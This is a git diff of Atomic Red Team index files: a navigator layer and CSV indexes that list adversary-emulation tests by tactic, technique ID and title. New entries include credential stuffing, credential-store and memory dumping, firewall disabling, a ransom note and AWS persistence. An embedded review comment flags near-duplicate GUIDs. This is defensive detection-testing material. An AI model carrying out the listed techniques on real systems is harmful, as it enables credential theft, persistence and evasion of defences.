hub.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"},{"techniqueID":"T1566.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1566","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1569.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https:
//github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1569.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1573","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"},{"techniqueID":"T1574.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574.011","score":100,"enabled":true,"comment":"https://g
ithub.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1609","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"},{"techniqueID":"T1610","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"},{"techniqueID":"T1611","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index da09d5a0..f727969f 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -5,12 +5,16 @@ credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-
credential-access,T1552.007,Container API,1,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash
credential-access,T1552.007,Container API,2,Cat the contents of a Kubernetes service account token file,788e0019-a483-45da-bcfe-96353d46820f,sh
credential-access,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
+credential-access,T1110.004,Credential Stuffing,1,SSH Credential Stuffing From Linux,4f08197a-2a8a-472d-9589-cd2895ef22ad,bash
+credential-access,T1110.004,Credential Stuffing,2,SSH Credential Stuffing From MacOS,d546a3d9-0be5-40c7-ad82-5a7d79e1b66b,bash
credential-access,T1552.001,Credentials In Files,1,Extract Browser and System credentials with LaZagne,9e507bb8-1d30-4e3b-a49b-cb5727d7ea79,bash
credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
credential-access,T1552.001,Credentials In Files,3,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell
credential-access,T1552.001,Credentials In Files,4,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt
credential-access,T1552.001,Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
credential-access,T1555,Credentials from Password Stores,1,Extract Windows Credential Manager via VBA,234f9b7c-b53d-4f32-897b-b880a6c9ea7b,powershell
+credential-access,T1555,Credentials from Password Stores,2,Dump credentials from Windows Credential Manager With PowerShell [windows Credentials],c89becbe-1758-4e7d-a0f4-97d2188a23e3,powershell
+credential-access,T1555,Credentials from Password Stores,3,Dump credentials from Windows Credential Manager With PowerShell [web Credentials],8fd5a296-6772-4766-9991-ff4e92af7240,powershell
credential-access,T1555.003,Credentials from Web Browsers,1,Run Chrome-password Collector,8c05b133-d438-47ca-a630-19cc464c4622,powershell
credential-access,T1555.003,Credentials from Web Browsers,2,Search macOS Safari Cookies,c1402f7b-67ca-43a8-b5f3-3143abedc01b,sh
credential-access,T1555.003,Credentials from Web Browsers,3,LaZagne - Credentials from Browser,9a2915b3-3954-4cce-8c76-00fbf4dbd014,command_prompt
@@ -62,6 +66,8 @@ credential-access,T1552.004,Private Keys,1,Private Keys,520ce462-7ca7-441e-b5a5-
credential-access,T1552.004,Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh
credential-access,T1552.004,Private Keys,3,Copy Private SSH Keys with CP,7c247dc7-5128-4643-907b-73a76d9135c3,sh
credential-access,T1552.004,Private Keys,4,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh
+credential-access,T1003.007,Proc Filesystem,1,Dump individual process memory with sh (Local),7e91138a-8e74-456d-a007-973d67a0bb80,sh
+credential-access,T1003.007,Proc Filesystem,2,Dump individual process memory with Python (Local),437b2003-a20d-4ed8-834c-4964f24eec63,sh
credential-access,T1003.002,Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt
credential-access,T1003.002,Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
credential-access,T1003.002,Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt
@@ -192,6 +198,7 @@ privilege-escalation,T1548.003,Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-
privilege-escalation,T1548.003,Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
privilege-escalation,T1548.003,Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
privilege-escalation,T1543.002,Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
+privilege-escalation,T1543.002,Systemd Service,2,"Create Systemd Service file, Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash
privilege-escalation,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
privilege-escalation,T1134.001,Token Impersonation/Theft,1,Named pipe client impersonation,90db9e27-8e7c-4c04-b602-a45927884966,powershell
privilege-escalation,T1134.001,Token Impersonation/Theft,2,`SeDebugPrivilege` token duplication,34f0a430-9d04-4d98-bcb5-1989f14719f0,powershell
@@ -265,10 +272,11 @@ defense-evasion,T1562.002,Disable Windows Event Logging,3,Impair Windows Audit L
defense-evasion,T1562.002,Disable Windows Event Logging,4,Clear Windows Audit Policy Config,913c0e4e-4b37-4b78-ad0b-90e7b25010f6,command_prompt
defense-evasion,T1562.004,Disable or Modify System Firewall,1,Disable firewall,80f5e701-f7a4-4d06-b140-26c8efd1b6b4,sh
defense-evasion,T1562.004,Disable or Modify System Firewall,2,Disable Microsoft Defender Firewall,88d05800-a5e4-407e-9b53-ece4174f197f,command_prompt
-defense-evasion,T1562.004,Disable or Modify System Firewall,3,Allow SMB and RDP on Microsoft Defender Firewall,d9841bf8-f161-4c73-81e9-fd773a5ff8c1,command_prompt
-defense-evasion,T1562.004,Disable or Modify System Firewall,4,Opening ports for proxy - HARDRAIN,15e57006-79dd-46df-9bf9-31bc24fb5a80,command_prompt
-defense-evasion,T1562.004,Disable or Modify System Firewall,5,Open a local port through Windows Firewall to any profile,9636dd6e-7599-40d2-8eee-ac16434f35ed,powershell
-defense-evasion,T1562.004,Disable or Modify System Firewall,6,Allow Executable Through Firewall Located in Non-Standard Location,6f5822d2-d38d-4f48-9bfc-916607ff6b8c,powershell
+defense-evasion,T1562.004,Disable or Modify System Firewall,3,Disable Microsoft Defender Firewall via Registry,afedc8c4-038c-4d82-b3e5-623a95f8a612,command_prompt
+defense-evasion,T1562.004,Disable or Modify System Firewall,4,Allow SMB and RDP on Microsoft Defender Firewall,d9841bf8-f161-4c73-81e9-fd773a5ff8c1,command_prompt
+defense-evasion,T1562.004,Disable or Modify System Firewall,5,Opening ports for proxy - HARDRAIN,15e57006-79dd-46df-9bf9-31bc24fb5a80,command_prompt
+defense-evasion,T1562.004,Disable or Modify System Firewall,6,Open a local port through Windows Firewall to any profile,9636dd6e-7599-40d2-8eee-ac16434f35ed,powershell
+defense-evasion,T1562.004,Disable or Modify System Firewall,7,Allow Executable Through Firewall Located in Non-Standard Location,6f5822d2-d38d-4f48-9bfc-916607ff6b8c,powershell
defense-evasion,T1562.001,Disable or Modify Tools,1,Disable syslog,4ce786f8-e601-44b5-bfae-9ebb15a7d1c8,sh
defense-evasion,T1562.001,Disable or Modify Tools,2,Disable Cb Response,ae8943f7-0f8d-44de-962d-fbc2e2f03eb8,sh
defense-evasion,T1562.001,Disable or Modify Tools,3,Disable SELinux,fc225f36-9279-4c39-b3f9-5141ab74f8d8,sh
@@ -318,7 +326,7 @@ defense-evasion,T1564.002,Hidden Users,1,Create Hidden User using UniqueID < 500
defense-evasion,T1564.002,Hidden Users,2,Create Hidden User using IsHidden option,de87ed7b-52c3-43fd-9554-730f695e7f31,sh
defense-evasion,T1564.003,Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-550b9f999b7a,powershell
defense-evasion,T1564,Hide Artifacts,1,Extract binary files via VBA,6afe288a-8a8b-4d33-a629-8d03ba9dad3a,powershell
-defense-evasion,T1564,Hide Artifacts,2,"Create a user called ""$"" as noted here",2ec63cc2-4975-41a6-bf09-dffdfb610778,command_prompt
+defense-evasion,T1564,Hide Artifacts,2,"Create a Hidden User Called ""$""",2ec63cc2-4975-41a6-bf09-dffdfb610778,command_prompt
defense-evasion,T1564,Hide Artifacts,3,"Create an ""Administrator "" user (with a space on the end)",5bb20389-39a5-4e99-9264-aeb92a55a85c,powershell
defense-evasion,T1562.003,Impair Command History Logging,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
defense-evasion,T1562.003,Impair Command History Logging,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
@@ -353,9 +361,12 @@ defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modificat
defense-evasion,T1078.003,Local Accounts,1,Create local account with admin priviliges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
defense-evasion,T1127.001,MSBuild,1,MSBuild Bypass Using Inline Tasks (C#),58742c0f-cb01-44cd-a60b-fb26e8871c93,command_prompt
defense-evasion,T1127.001,MSBuild,2,MSBuild Bypass Using Inline Tasks (VB),ab042179-c0c5-402f-9bc8-42741f5ce359,command_prompt
+defense-evasion,T1553.005,Mark-of-the-Web Bypass,1,Mount ISO image,002cca30-4778-4891-878a-aaffcfa502fa,powershell
+defense-evasion,T1553.005,Mark-of-the-Web Bypass,2,Mount an ISO image and run executable from the ISO,42f22b00-0242-4afc-a61b-0da05041f9cc,powershell
defense-evasion,T1036.004,Masquerade Task or Service,1,Creating W32Time similar named service using schtasks,f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9,command_prompt
defense-evasion,T1036.004,Masquerade Task or Service,2,Creating W32Time similar named service using sc,b721c6ef-472c-4263-a0d9-37f1f4ecff66,command_prompt
defense-evasion,T1036,Masquerading,1,System File Copied to Unusual Location,51005ac7-52e2-45e0-bdab-d17c6d4916cd,command_prompt
+defense-evasion,T1036.005,Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory.,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh
defense-evasion,T1112,Modify Registry,1,Modify Registry of Current User Profile - cmd,1324796b-d0f6-455a-b4ae-21ffee6aa6b9,command_prompt
defense-evasion,T1112,Modify Registry,2,Modify Registry of Local Machine - cmd,282f929a-6bc5-42b8-bd93-960c3ba35afe,command_prompt
defense-evasion,T1112,Modify Registry,3,Modify registry to store logon credentials,c0413fb5-33e2-40b7-9b6f-60b29f4a7a18,command_prompt
@@ -481,6 +492,8 @@ persistence,T1546.008,Accessibility Features,1,Attaches Command Prompt as a Debu
persistence,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
persistence,T1098,Account Manipulation,1,Admin Account Manipulate,5598f7cb-cf43-455e-883a-f6008c5d46af,powershell
persistence,T1098,Account Manipulation,2,Domain Account and Group Manipulate,a55a22e9-a3d3-42ce-bd48-2653adb8f7a9,powershell
+persistence,T1098,Account Manipulation,3,AWS - Create a group and add a user to that group,8822c3b0-d9f9-4daf-a043-49f110a31122,sh
+persistence,T1098.001,Additional Cloud Credentials,1,AWS - Create Access Key and Secret Key,8822c3b0-d9f9-4daf-a043-491160a31122,sh
persistence,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
persistence,T1546.011,Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt
persistence,T1546.011,Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell
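Review bot: The two new AWS entries at the end of this hunk carry auto_generated_guid values that differ by only a few characters (`8822c3b0-d9f9-4daf-a043-49f110a31122` for T1098 test 3 and `8822c3b0-d9f9-4daf-a043-491160a31122` for T1098.001 test 1), which looks like a hand-edited copy rather than a freshly generated identifier; the same pair reappears in linux-index.csv in the hunk ending at the RC Scripts / Browser Extensions block. Since these indexes appear to be generated from the atomics YAML, the place to fix it is the source test definitions, regenerating a distinct GUID for one of the two so that tooling keyed on the guid (execution logs, the hash database) cannot confuse them. It would also be worth a quick uniqueness check across the full index, because near-duplicates like this are easy to miss by eye.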
@@ -499,6 +512,7 @@ persistence,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-
persistence,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
persistence,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
persistence,T1546.001,Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt
+persistence,T1136.003,Cloud Account,1,AWS - Create a new IAM user,8d1c2368-b503-40c9-9057-8e42f21c58ad,sh
persistence,T1053.007,Container Orchestration Job,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
persistence,T1053.007,Container Orchestration Job,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
persistence,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
@@ -565,6 +579,7 @@ persistence,T1547.009,Shortcut Modification,1,Shortcut Modification,ce4fc678-364
persistence,T1547.009,Shortcut Modification,2,Create shortcut to cmd in startup folders,cfdc954d-4bb0-4027-875b-a1893ce406f2,powershell
persistence,T1037.005,Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh
persistence,T1543.002,Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
+persistence,T1543.002,Systemd Service,2,"Create Systemd Service file, Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash
persistence,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
persistence,T1505.002,Transport Agent,1,Install MS Exchange Transport Agent Persistence,43e92449-ff60-46e9-83a3-1a38089df94d,powershell
persistence,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh
@@ -587,6 +602,7 @@ impact,T1486,Data Encrypted for Impact,1,Encrypt files using gpg (Linux),7b8ce08
impact,T1486,Data Encrypted for Impact,2,Encrypt files using 7z (Linux),53e6735a-4727-44cc-b35b-237682a151ad,bash
impact,T1486,Data Encrypted for Impact,3,Encrypt files using ccrypt (Linux),08cbf59f-85da-4369-a5f4-049cffd7709f,bash
impact,T1486,Data Encrypted for Impact,4,Encrypt files using openssl (Linux),142752dc-ca71-443b-9359-cf6f497315f1,bash
+impact,T1486,Data Encrypted for Impact,5,PureLocker Ransom Note,649349c7-9abf-493b-a7a2-b1aa4d141528,command_prompt
impact,T1490,Inhibit System Recovery,1,Windows - Delete Volume Shadow Copies,43819286-91a9-4369-90ed-d31fb4da2c01,command_prompt
impact,T1490,Inhibit System Recovery,2,Windows - Delete Volume Shadow Copies via WMI,6a3ff8dd-f49c-4272-a658-11c2fe58bd88,command_prompt
impact,T1490,Inhibit System Recovery,3,Windows - wbadmin Delete Windows Backup Catalog,263ba6cb-ea2b-41c9-9d4e-b652dadd002c,command_prompt
@@ -788,6 +804,7 @@ execution,T1053.005,Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8
execution,T1053.005,Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell
execution,T1569.002,Service Execution,1,Execute a Command as a Service,2382dee2-a75f-49aa-9378-f52df6ed3fb1,command_prompt
execution,T1569.002,Service Execution,2,Use PsExec to execute a command on a remote host,873106b7-cfed-454b-8680-fa9f6400431c,command_prompt
+execution,T1072,Software Deployment Tools,1,Radmin Viewer Utility,b4988cad-6ed2-434d-ace5-ea2670782129,command_prompt
execution,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
execution,T1059.004,Unix Shell,1,Create and Execute Bash Shell Script,7e7ac3ed-f795-4fa5-b711-09d6fbe9b873,sh
execution,T1059.004,Unix Shell,2,Command-Line Interface,d0c88567-803d-4dca-99b4-7ce65e7b257c,sh
@@ -815,6 +832,7 @@ lateral-movement,T1021.002,SMB/Windows Admin Shares,1,Map admin share,3386975b-3
lateral-movement,T1021.002,SMB/Windows Admin Shares,2,Map Admin Share PowerShell,514e9cd7-9207-4882-98b1-c8f791bae3c5,powershell
lateral-movement,T1021.002,SMB/Windows Admin Shares,3,Copy and Execute File with PsExec,0eb03d41-79e4-4393-8e57-6344856be1cf,command_prompt
lateral-movement,T1021.002,SMB/Windows Admin Shares,4,Execute command writing output to local Admin Share,d41aaab5-bdfe-431d-a3d5-c29e9136ff46,command_prompt
+lateral-movement,T1072,Software Deployment Tools,1,Radmin Viewer Utility,b4988cad-6ed2-434d-ace5-ea2670782129,command_prompt
lateral-movement,T1021.006,Windows Remote Management,1,Enable Windows Remote Management,9059e8de-3d7d-4954-a322-46161880b9cf,powershell
lateral-movement,T1021.006,Windows Remote Management,2,Invoke-Command,5295bd61-bd7e-4744-9d52-85962a4cf2d6,powershell
lateral-movement,T1021.006,Windows Remote Management,3,WinRM Access with Evil-WinRM,efe86d95-44c4-4509-ae42-7bfd9d1f5b3d,powershell
@@ -836,6 +854,7 @@ command-and-control,T1105,Ingress Tool Transfer,10,Windows - PowerShell Download
command-and-control,T1105,Ingress Tool Transfer,11,OSTAP Worming Activity,2ca61766-b456-4fcf-a35a-1233685e1cad,command_prompt
command-and-control,T1105,Ingress Tool Transfer,12,svchost writing a file to a UNC path,fa5a2759-41d7-4e13-a19c-e8f28a53566f,command_prompt
command-and-control,T1105,Ingress Tool Transfer,13,Download a File with Windows Defender MpCmdRun.exe,815bef8b-bf91-4b67-be4c-abe4c2a94ccc,command_prompt
+command-and-control,T1105,Ingress Tool Transfer,14,whois file download,c99a829f-0bb8-4187-b2c6-d47d1df74cab,sh
command-and-control,T1090.001,Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh
command-and-control,T1090.001,Internal Proxy,2,Connection Proxy for macOS UI,648d68c1-8bcd-4486-9abe-71c6655b6a2c,sh
command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell
diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv
index d7c342f8..31e71a51 100644
--- a/atomics/Indexes/Indexes-CSV/linux-index.csv
+++ b/atomics/Indexes/Indexes-CSV/linux-index.csv
@@ -4,6 +4,7 @@ credential-access,T1003.008,/etc/passwd and /etc/shadow,2,Access /etc/passwd (Lo
credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
credential-access,T1552.007,Container API,1,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash
credential-access,T1552.007,Container API,2,Cat the contents of a Kubernetes service account token file,788e0019-a483-45da-bcfe-96353d46820f,sh
+credential-access,T1110.004,Credential Stuffing,1,SSH Credential Stuffing From Linux,4f08197a-2a8a-472d-9589-cd2895ef22ad,bash
credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
credential-access,T1552.001,Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
credential-access,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
@@ -11,6 +12,8 @@ credential-access,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-49
credential-access,T1552.004,Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh
credential-access,T1552.004,Private Keys,3,Copy Private SSH Keys with CP,7c247dc7-5128-4643-907b-73a76d9135c3,sh
credential-access,T1552.004,Private Keys,4,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh
+credential-access,T1003.007,Proc Filesystem,1,Dump individual process memory with sh (Local),7e91138a-8e74-456d-a007-973d67a0bb80,sh
+credential-access,T1003.007,Proc Filesystem,2,Dump individual process memory with Python (Local),437b2003-a20d-4ed8-834c-4964f24eec63,sh
collection,T1560.002,Archive via Library,1,Compressing data using GZip in Python (Linux),391f5298-b12d-4636-8482-35d9c17d53a8,bash
collection,T1560.002,Archive via Library,2,Compressing data using bz2 in Python (Linux),c75612b2-9de0-4d7c-879c-10d7b077072d,bash
collection,T1560.002,Archive via Library,3,Compressing data using zipfile in Python (Linux),001a042b-859f-44d9-bf81-fd1c4e2200b0,bash
@@ -42,6 +45,7 @@ privilege-escalation,T1548.003,Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-
privilege-escalation,T1548.003,Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
privilege-escalation,T1548.003,Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
privilege-escalation,T1543.002,Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
+privilege-escalation,T1543.002,Systemd Service,2,"Create Systemd Service file, Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash
privilege-escalation,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
privilege-escalation,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh
privilege-escalation,T1546.004,Unix Shell Configuration Modification,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
@@ -87,6 +91,7 @@ defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modificat
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,7,chown - Change file or folder mode ownership only,967ba79d-f184-4e0e-8d09-6362b3162e99,bash
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,8,chown - Change file or folder ownership recursively,3b015515-b3d8-44e9-b8cd-6fa84faf30b2,bash
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,9,chattr - Remove immutable file attribute,e7469fe2-ad41-4382-8965-99b94dd3c13f,sh
+defense-evasion,T1036.005,Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory.,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh
defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh
defense-evasion,T1036.003,Rename System Utilities,2,Masquerading as Linux crond process.,a315bfff-7a98-403b-b442-2ea1b255e556,sh
defense-evasion,T1014,Rootkit,1,Loadable Kernel Module based Rootkit,dfb50072-e45a-4c75-a17e-a484809c8553,sh
@@ -146,10 +151,13 @@ discovery,T1082,System Information Discovery,11,Environment variables discovery
discovery,T1016,System Network Configuration Discovery,3,System Network Configuration Discovery,c141bbdb-7fca-4254-9fd6-f47e79447e17,sh
discovery,T1049,System Network Connections Discovery,3,System Network Connections Discovery Linux & MacOS,9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b677d-a230-44f4-ad86-782df1ef108c,sh
+persistence,T1098,Account Manipulation,3,AWS - Create a group and add a user to that group,8822c3b0-d9f9-4daf-a043-49f110a31122,sh
+persistence,T1098.001,Additional Cloud Credentials,1,AWS - Create Access Key and Secret Key,8822c3b0-d9f9-4daf-a043-491160a31122,sh
persistence,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
+persistence,T1136.003,Cloud Account,1,AWS - Create a new IAM user,8d1c2368-b503-40c9-9057-8e42f21c58ad,sh
persistence,T1053.007,Container Orchestration Job,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
persistence,T1053.007,Container Orchestration Job,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
persistence,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
@@ -164,6 +172,7 @@ persistence,T1037.004,RC Scripts,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3
persistence,T1037.004,RC Scripts,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash
persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash
